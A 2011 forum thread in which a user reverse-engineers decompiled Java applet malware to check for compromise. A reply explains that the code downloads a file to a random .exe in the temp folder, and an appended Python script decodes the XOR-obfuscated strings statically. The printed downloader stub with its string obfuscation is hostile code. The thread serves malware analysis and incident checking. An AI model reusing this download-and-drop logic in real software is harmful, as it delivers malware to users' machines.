Thread: Decrypting Java Malware
- 01-26-2011, 07:16 AM #1
Hey guys,
I was trying to reverse engineer some Java malware. I copied and pasted the part of the code that seems to set the URL. My logic is trying to get the URL so that I can see if there were any requests made to that URL so that I can figure out if I've been compromised.
I was wondering if you guys can help me modify this code so that I can decrypt the URL. So far I got this:
    import java.applet.Applet;
    import java.io.FileOutputStream;
    import java.io.InputStream;
    import java.net.URL;
    import java.util.*;
    import javax.swing.JList;
    // Referenced classes of package folder:
    // Temp, Glocker
    //public class Globus extends Applet
    class Globus {
        public void start()
        {
            //super.start();
            try
            {
                int arr[] = {
                    86, 81, 79
                };
                String balls = decrypt(arr);
                int arr2[] = {
                    13, 70, 91, 70
                };
                String rores = decrypt(arr2);
                int arr3[] = {
                    73, 66, 85, 66, 13, 74, 76, 13, 87, 78,
                    83, 71, 74, 81
                };
                String bdfd = decrypt(arr3);
                String ss = balls;
                String s = ss;
                String s1 = (new StringBuilder()).append(Math.random()).append(rores).toString();
                String s2 = System.getProperty(bdfd);
                try
                {
                    String str = (new StringBuilder(String.valueOf(s2))).append(s1).toString();
                    URL url = new URL(s);
                    System.out.println(url);
                    url.openConnection();
                    InputStream inputstream = url.openStream();
                    FileOutputStream fileoutputstream = new FileOutputStream(str);
                    byte abyte0[] = new byte[1024];
                    int i;
                    while((i = inputstream.read(abyte0, 0, abyte0.length)) != -1)
                        fileoutputstream.write(abyte0, 0, i);
                    inputstream.close();
                    fileoutputstream.close();
                    //Temp.here(str);
                }
                catch(Exception exception1) { }
            }
            catch(Exception exception) { }
        }
        static String decrypt(int arr[])
        {
            byte xor = (byte)(int)Math.ceil(34.329999999999998D);
            StringBuffer strbuf = new StringBuffer();
            for(int i = 0; i < arr.length; i++)
            {
                arr[i] = arr[i] ^ xor;
                strbuf.append((char)arr[i]);
            }
            String result = strbuf.toString();
            return result;
        }
    }
When I try to execute it I get Exception in thread "main" java.lang.NoSuchMethodError: main
Thanks!
- 01-27-2011, 12:08 AM #2
The arr[] becomes the URL; here it is the literal string "url", so you don't have the part that provides the data for the URL itself yet.
Though when this runs, it tries to create a random-number-named file with a .exe extension (e.g. 0.34068800532325605.exe) in the system's temp folder, then it connects to this URL and downloads the contents into this executable.
I suspect it then executes this executable.
So to tell if you have been infected, you might try to see in Task Manager if any funny-looking executables are currently running, or if there are funny .exe files in your temp folder.
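Added example (not part of either post above, and not the sample's own code): a Python script that pulls every int[] literal out of the decompiled source as text and XORs it with the key the sample's decrypt() computes, so the strings can be read without executing the applet. The function names xor_decode and decode_arrays are chosen here for illustration.

```python
import math
import re

# Key as computed by the sample's decrypt(): (byte) Math.ceil(34.33) == 35
XOR_KEY = math.ceil(34.329999999999998)

# Excerpt of the decompiled source from the first post, embedded as text only.
DECOMPILED = """
int arr[] = {
86, 81, 79
};
String balls = decrypt(arr);
int arr2[] = {
13, 70, 91, 70
};
String rores = decrypt(arr2);
int arr3[] = {
73, 66, 85, 66, 13, 74, 76, 13, 87, 78,
83, 71, 74, 81
};
String bdfd = decrypt(arr3);
"""

# Matches `int name[] = { 1, 2, 3 }`, including literals split across lines.
ARRAY_RE = re.compile(r"int\s+(\w+)\s*\[\]\s*=\s*\{([\d\s,]*)\}")


def xor_decode(values, key=XOR_KEY):
    """Reverse decrypt(): XOR each int with the key and map it to a char.
    (Hypothetical helper name, not from the sample.)"""
    return "".join(chr(v ^ key) for v in values)


def decode_arrays(source, key=XOR_KEY):
    """Return {array_name: decoded_string} for every int[] literal in source.
    (Hypothetical helper name, not from the sample.)"""
    decoded = {}
    for name, body in ARRAY_RE.findall(source):
        values = [int(tok) for tok in re.findall(r"\d+", body)]
        decoded[name] = xor_decode(values, key)
    return decoded


if __name__ == "__main__":
    for name, text in decode_arrays(DECOMPILED).items():
        print(f"{name}: {text!r}")
```

The same function can be pointed at the full decompiled source of the other referenced classes to list any further obfuscated strings that use this key.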